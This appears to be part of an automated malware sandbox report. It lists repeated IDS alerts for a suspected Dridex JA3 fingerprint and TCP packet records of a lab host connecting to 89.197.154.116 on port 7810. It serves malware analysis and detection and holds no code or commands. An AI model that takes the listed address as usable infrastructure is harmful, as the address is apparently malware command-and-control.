                                          2024-10-13T01:58:35.029835+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976289.197.154.1167810TCP
                                          2024-10-13T01:58:36.122655+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976389.197.154.1167810TCP
                                          2024-10-13T01:58:37.301019+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976489.197.154.1167810TCP
                                          2024-10-13T01:58:38.519500+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976589.197.154.1167810TCP
                                          2024-10-13T01:58:39.625320+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976689.197.154.1167810TCP
                                          2024-10-13T01:58:40.793850+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976789.197.154.1167810TCP
                                          2024-10-13T01:58:41.917877+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976889.197.154.1167810TCP
                                          2024-10-13T01:58:43.054662+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976989.197.154.1167810TCP
                                          2024-10-13T01:58:44.138422+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977089.197.154.1167810TCP
                                          2024-10-13T01:58:45.245472+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977189.197.154.1167810TCP
                                          2024-10-13T01:58:46.339598+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977289.197.154.1167810TCP
                                          2024-10-13T01:58:47.441530+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977389.197.154.1167810TCP
                                          2024-10-13T01:58:48.570807+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977489.197.154.1167810TCP
                                          2024-10-13T01:58:49.678440+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977589.197.154.1167810TCP
                                          2024-10-13T01:58:50.780258+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977689.197.154.1167810TCP
                                          2024-10-13T01:58:51.821189+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977789.197.154.1167810TCP
                                          2024-10-13T01:58:52.918133+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977889.197.154.1167810TCP
                                          2024-10-13T01:58:54.014418+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977989.197.154.1167810TCP
                                          2024-10-13T01:58:55.376425+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44978089.197.154.1167810TCP
                                          2024-10-13T01:58:56.481492+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44978189.197.154.1167810TCP
                                          2024-10-13T01:58:57.692454+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44978489.197.154.1167810TCP
                                          2024-10-13T01:58:58.806021+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44979089.197.154.1167810TCP
                                          2024-10-13T01:58:59.903530+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44979689.197.154.1167810TCP
                                          2024-10-13T01:59:00.995787+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44980789.197.154.1167810TCP
                                          2024-10-13T01:59:02.104581+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44981389.197.154.1167810TCP
                                          2024-10-13T01:59:03.200437+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44982089.197.154.1167810TCP
                                          2024-10-13T01:59:06.274200+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44983089.197.154.1167810TCP
                                          2024-10-13T01:59:07.334342+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44983689.197.154.1167810TCP
                                          2024-10-13T01:59:08.458709+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44984789.197.154.1167810TCP
                                          2024-10-13T01:59:09.569367+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44985389.197.154.1167810TCP
                                          2024-10-13T01:59:10.689347+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44986489.197.154.1167810TCP
                                          2024-10-13T01:59:11.821962+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44987089.197.154.1167810TCP
                                          2024-10-13T01:59:12.983260+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44988089.197.154.1167810TCP
                                          2024-10-13T01:59:14.083861+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44988789.197.154.1167810TCP
                                          2024-10-13T01:59:15.199920+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44989789.197.154.1167810TCP
                                          2024-10-13T01:59:16.293948+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44990489.197.154.1167810TCP
                                          2024-10-13T01:59:17.418259+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44991089.197.154.1167810TCP
                                          2024-10-13T01:59:18.534043+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44992189.197.154.1167810TCP
                                          2024-10-13T01:59:19.639635+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44992789.197.154.1167810TCP
                                          2024-10-13T01:59:20.918631+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44993889.197.154.1167810TCP
                                          2024-10-13T01:59:22.011799+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44994489.197.154.1167810TCP
                                          2024-10-13T01:59:23.116129+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44995089.197.154.1167810TCP
                                          2024-10-13T01:59:24.244252+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44996189.197.154.1167810TCP
                                          2024-10-13T01:59:25.365276+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44996789.197.154.1167810TCP
                                          2024-10-13T01:59:26.549497+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44997889.197.154.1167810TCP
                                          2024-10-13T01:59:28.866437+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44999089.197.154.1167810TCP
                                          2024-10-13T01:59:31.157476+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45000789.197.154.1167810TCP
                                          2024-10-13T01:59:33.819291+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45002989.197.154.1167810TCP
                                          2024-10-13T01:59:36.412562+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45004689.197.154.1167810TCP
                                          2024-10-13T01:59:38.766032+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45006389.197.154.1167810TCP
                                          2024-10-13T01:59:41.145936+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45008089.197.154.1167810TCP
                                          2024-10-13T01:59:43.479729+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45008789.197.154.1167810TCP
                                          2024-10-13T01:59:45.760052+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45008989.197.154.1167810TCP
                                          2024-10-13T01:59:48.170632+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45009189.197.154.1167810TCP
                                          2024-10-13T01:59:50.771816+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45009389.197.154.1167810TCP
                                          2024-10-13T01:59:53.200985+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45009589.197.154.1167810TCP
                                          2024-10-13T01:59:55.526273+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45009789.197.154.1167810TCP
                                          2024-10-13T01:59:58.016626+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45009989.197.154.1167810TCP
                                          2024-10-13T02:00:00.393957+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45010189.197.154.1167810TCP
                                          2024-10-13T02:00:02.899997+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45010389.197.154.1167810TCP
                                          2024-10-13T02:00:05.681679+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45010589.197.154.1167810TCP
                                          2024-10-13T02:00:08.156494+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.45010789.197.154.1167810TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2024 01:58:04.033127069 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:04.040237904 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:04.040507078 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:04.053594112 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:04.058619976 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:04.664537907 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:04.664696932 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:04.812803030 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:04.812939882 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.125873089 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.131089926 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.302993059 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.303184986 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.427422047 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.428059101 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.433223963 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.438528061 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.623368025 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.623454094 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.623472929 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.623506069 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.623532057 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.623562098 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.624047995 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.624089956 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.628895998 CEST78104973089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.628979921 CEST497307810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.734957933 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.740432024 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.740653992 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.741125107 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.741125107 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:06.746433973 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:06.746474028 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.339823961 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.340142012 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.469965935 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.470052958 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.556104898 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.562306881 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.572779894 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.578363895 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.806982994 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.807302952 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.807347059 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.807436943 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.807552099 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.807552099 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.900763988 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.900763988 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:07.906127930 CEST78104973289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:07.906198025 CEST497327810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.063149929 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.068681955 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:08.068901062 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.069176912 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.074326038 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:08.669408083 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:08.669481039 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.805089951 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:08.805331945 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.805944920 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.807493925 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:08.811033964 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:08.812804937 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.054753065 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.054799080 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.054830074 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.054944038 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.054944038 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.054944038 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.055296898 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.055296898 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.060470104 CEST78104973389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.060544014 CEST497337810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.203718901 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.209000111 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.209101915 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.209474087 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.214473009 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.810558081 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.810635090 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.940921068 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.941122055 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.943557024 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.944993019 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:09.948952913 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:09.950227976 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:10.193896055 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:10.193947077 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:10.194102049 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.194102049 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.194540024 CEST497347810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.199589014 CEST78104973489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:10.655857086 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.783936024 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:10.784049988 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.786084890 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:10.791410923 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.396661997 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.397010088 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.531239033 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.531312943 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.531637907 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.532932043 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.536834955 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.538079977 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785156965 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785201073 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785233974 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785463095 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.785752058 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.785752058 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.790747881 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.790941954 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.891109943 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.896761894 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.897089005 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.897403955 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.902420044 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724518061 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724597931 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.724699020 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724739075 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724754095 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.724792957 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.727179050 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.728600025 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.732079983 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.733441114 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981595039 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981847048 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981868982 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981911898 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.981935978 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.981935978 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.982307911 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.982307911 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.987328053 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.987545013 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.094657898 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.242726088 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.242842913 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.243241072 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.248078108 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.852277040 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.852516890 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.982912064 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.983021975 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.990137100 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.991647005 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.995135069 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.996643066 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240271091 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240312099 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240344048 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240365982 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.240442991 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.240442991 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.241137981 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.241167068 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.246025085 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.246099949 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.345732927 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.350956917 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.351281881 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.351691008 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.356817007 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.951570988 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.951901913 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.080398083 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.080761909 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.081281900 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.082828999 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.086456060 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.087824106 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328530073 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328574896 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328608036 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.329420090 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.329421043 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.334669113 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.335020065 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.438261032 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.443716049 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.443929911 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.444308043 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.449482918 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.065859079 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.066066027 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.200870991 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.201077938 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.201731920 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.203373909 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.207124949 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.208276987 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456257105 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456341028 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.456439018 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456473112 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456502914 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.456538916 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.457076073 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.457109928 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.461936951 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.461998940 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.564461946 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.569390059 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.569510937 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.569976091 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.574906111 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.180205107 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.180336952 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.314620972 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.314702988 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.315336943 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.316397905 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.320163012 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.321223021 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567353010 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567426920 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567449093 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567464113 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567492008 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567516088 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567831993 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567871094 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.572643995 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.572717905 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.673121929 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.678159952 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.678242922 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.678565979 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.683475971 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.280097961 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.280189991 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.412904024 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.412981033 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.413424969 CEST497417810192.168.2.489.197.154.116
